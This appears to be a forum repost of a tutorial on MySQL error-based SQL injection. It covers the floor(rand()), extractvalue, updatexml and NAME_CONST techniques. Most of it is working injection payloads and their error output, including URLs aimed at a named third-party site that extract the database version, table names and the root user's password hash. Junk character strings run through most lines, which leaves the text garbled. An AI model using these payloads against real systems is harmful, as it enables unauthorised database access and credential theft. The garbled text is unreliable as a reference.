|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
( o6 m# w! \7 u3 ?3 f7 {7 j( Q( Z4 v首先进行正常查询: mysql> select * from article where id = 1;& U# l% A0 I+ t/ }
+—-+——-+———+
8 y2 r1 I4 n4 w| id | title | content |- o& l$ Y! c0 U
+—-+——-+———+
- U- C7 r% }0 |9 I3 A7 ]| 1 | test | do it |
* w" u$ ?- |9 H3 N+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);6 V; J. b: ?3 D0 T+ g
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。3 n' K. F9 W+ Y$ F* u
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);' i0 f' U% B; }( r8 W
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2))); I; K6 ~9 Y) |+ B: U, V
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue
: A( a0 ~4 N+ g2 l测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
4 Q' Y+ x9 {, x8 [ r9 [7 OERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
! U$ z# E& i6 `+ ^- z1 Y$ B0 R% f! M% V4 F) ^+ V
再收集:
8 a0 Q+ F8 N& ^7 F/ S' Fhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
0 g0 {; \' W3 D3 v' [7 O; L
. ^& U- [/ W5 ?) u" P, m7 zError uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’! p2 Y& Y+ H& ]
4 S7 Z3 r" e7 O6 t. ~( ] Y9 A: p" k
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)3 [6 [) M+ Q* d) {( L( X
7 I5 o# ~' c6 N' _( R
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ # W' _- Y C( y
8 E& }' |% z4 Z3 {
MYSQL高版本报错注入技巧-利用NAME_CONST注入; g! z$ l8 p1 L/ g
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
, B+ t( D8 k+ d/ v( ^
y8 I8 t, H2 ` N V' i7 q) U) f! |- R5 I& T% R
相关信息
$ e A* j* W- \: o! _$ x0 M; w4 C* Y% Y/ A+ w8 O( w; j; G
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
2 S/ i, s$ Y1 F8 ^3 ]* y
" |6 E: d; d# J7 SCode:! W6 i8 t4 w* r$ H
NAME_CONST(DATA, VALUE)( q$ h+ f+ ~% e w5 ^% ~& K1 Z
O" X& o1 B4 x0 j1 _2 A. b- RReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
) e/ |, ]3 ~& b2 p" |8 G9 Q0 U) z3 x' ?! ^
SELECT NAME_CONST('TEST', 1)) |- d9 b* o5 s+ @/ K; _4 L. o
8 f3 J1 k2 B' x) \ W* e& S# I- B
. m+ ?1 G$ ?, T1 }
0 T( Z# ?! d: O) m|---------------|4 m6 F- F8 Q9 x# h8 f
| TEST |3 f. o5 X y! u# X( x7 b
| |3 D6 M: F* m0 z9 `1 @. O5 G
|---------------| u6 @' z$ ~! p: d7 m6 D4 ^. [
| 1 |
, q9 a4 w! j! p| |
) N8 a ~& i" ~+ W/ E|---------------|7 @' j X5 W, f# `& M. C
! W0 x5 @8 h. e
7 D( l* r% G8 p* p7 Z' O7 f& H: C. t/ L& n( C
$ P9 x4 M$ p9 i2 G3 ehttp://dev.mysql.com/doc/refman/5.0/en/m...name-const' g& y0 o3 j, Y% J
Intro to MySQL Variables" ^) m& p" y% K5 G
, N# z. C3 L6 d( J/ J* lOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
& H& T# E% C9 A+ k0 V6 H
1 s: y, _* O/ S9 S7 zCode:/ M, M& P6 @* G
http://www.baido.hk/qcwh/content ... ;sid=19&cid=2610 \2 E" q! m0 C( z0 k/ {' _7 T
; r% H1 |# U; r. J- M8 B* l+ \9 r" I8 D1 d, o+ d
7 \" C2 \$ p; Q3 J2 z& R" D
! Q+ [9 t6 W6 s% n3 Q$ E4 |: }$ y/ B. v# E2 e. Q D
Code:* d0 @7 f1 h! s6 G: Z/ ]
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--& y+ p: ?, |+ } S9 z0 Y: D
" b# o- j6 S1 c
1 f6 E4 x& b- k7 kVAR = Your MySQL variable.
% o( u: `) D, |6 E+ a& e% D. Z/ _% m1 [! T0 m* N- W* c2 I
MySQL 5.1.3 Server System Variables
4 ~3 _6 w M+ D2 P. o; o+ y" e, m9 v. u, S" V5 t/ N4 W
Let's try it out on my site..
4 |" u F& C( o, H$ r; c, `; I3 S' Y
J0 @, D+ V- O8 ^, M- h5 pCode:' t5 c3 Q& v2 ]7 ?" b# ?$ t# O
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
5 u- O" T8 F: }$ K" f
* D0 m/ E4 Y. Y1 y* _ WErroruplicate column name '5.0.27-community-nt'7 {1 y0 n) L0 m
9 \ j% M8 f, l; t0 h" Z
# f) J& g: I$ q! v" ^* u
4 ]& H- w/ \) e6 C
6 A0 D: V6 h2 e9 h$ k2 b* p3 ^+ \1 h; {. R
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again.... k4 ~# v0 R M0 f1 R* f; f2 V
7 P8 s/ `- u1 B" W' {) F8 J- M
Data Extraction; }7 C. }! E) j1 ?! o! R ~! w
) l/ i& R; O: [( W1 Z6 Z
Code:
8 F) h2 D7 e$ ]9 Q4 I0 |+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
9 M$ d; D9 n" p
' P5 x& U. x& f
: C$ H+ r; `% k9 a+ c. |+ ZWe should get a duplicate column 1 error.... U; z9 H) o9 K
" g6 g" @% M/ RCode:
! H; Q+ w! `. l* t8 _2 B6 vhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--; a) V1 z) N6 r8 Z
" r8 J% A. H6 {Erroruplicate column name '12 X! w3 r1 A1 z) W
: h% F: s& E6 i& J! D5 ]
5 U+ ?# @$ W- P' c5 N5 p& _7 }
# P) {3 w- O# T
& d% l( q1 t0 R: x$ r" B! W
' Y1 X2 l5 E3 ~" K* e+ ?$ _$ q$ |/ R1 K/ n! j2 I
Now let's get the tables out this bitch..
* o# U) h+ W8 G- I3 f& V
/ z. J9 a' P- ^Code:
6 y+ T, M7 n7 \4 M4 F+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
1 ?5 u/ q$ `( j5 D( ]: s% m" n0 v2 S& `, R7 O8 n
% u* {6 t) f# O9 z& N- N# ]0 j
Let's see if it works here, if it does, we can go on and finish the job.
9 C* l9 h8 H i$ k) P. v
- r1 ]8 X2 M- F3 T" H2 ?Code:: b+ M7 b# {( O. P" h# _7 g* ]* I
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--3 K$ g8 z& k! D: O1 C4 x1 y3 G; H
6 ~! o5 c6 K( n- V8 U
) z5 Y2 C8 [. {9 y; F3 bErroruplicate column name 'com_admanage; @! ]% |% ^- J" J
) {1 y8 [0 p& j% @( B: E& o5 {% d( ]3 M6 V# }) {: X' B/ N
" y/ Q1 y3 `1 r" A5 ~& Z) q" C* `- ^! S6 P! n* [
3 y- O' X! b" [( w' s' u& s4 }
( `% H* B; F% P* F tNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.
1 Y2 c8 K7 J% A" O9 E( `8 s! K$ T& W. |1 j; Y* \) `8 k
Let's get the columns out of the user table..
9 O# K# I1 \% O$ O9 q6 w' E& l- c$ F* x
Code:' l& z# Q. ^& l5 t! N" G& r3 S6 p
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--9 g# \2 C# P& _5 T
7 V; p, J4 U$ r! ` c4 G. [% e u+ Z u+ \- O+ i# ?- x/ ~
So mine looks like this, and I get the duplicate column name 'Host'.
1 [. B+ {$ p0 ?; H9 F" \
9 w$ l' w; N5 W' Y1 b0 xCode:* @- v$ U" z% Q! o/ _
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
4 V* V# N, N+ o+ K2 X& O: e7 h$ B9 ~( r, g8 \6 o
Erroruplicate column name 'Host': |% u1 }# ~6 I( M! k$ f
, q, [2 Y" r9 z' g+ N' k+ o
2 C( K6 [ h0 o' F+ D0 l$ _) |. t0 G! _+ R6 d0 d/ B8 `2 L
% _' O# Y0 j3 S$ r$ K
8 v0 ^- p: m5 F. p3 Q1 S
4 c" q$ {6 t4 d) p7 G
Woot, time to finish this bitch off.7 w" a: K, |1 b/ U, ~
9 t1 n4 G2 R8 T& sCode:
9 P. b! x, j; @+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
" R+ N; v. K( ~8 V6 i3 R" |% X) P" y3 p
. Q% z7 s; t; J0 p. VSo mine looks like this...
, J, B) y% w& L: C7 V3 g* e' C$ O0 A
; Q9 ]+ p1 {# V9 D y3 JCode:
! i6 N1 m* N' K2 U9 m$ G1 a5 O5 ohttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)-- I: M/ C( {7 r; i& D; |8 e
: J5 g E* H* o/ [5 {$ n' F* zErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'- V' |5 k. y3 H/ j- v
& H: S( a. I) G+ D# U, ?5 o5 [1 L" Q; Q7 v3 f! Z' h" w
' p6 X- }, U# I1 U( j( _4 {- X; _" k0 h6 C' U; k m
7 Q8 a) c" {1 M
+ p" l' A9 F5 r$ s" C- mAnd there we have it, thanks for reading./ Q/ V" ^, S4 W/ x0 k- X4 w
& |5 ]7 R9 a- m6 }6 v2 t- f) J
|
发表于 2015-11-11 19:03:37
收藏
支持
反对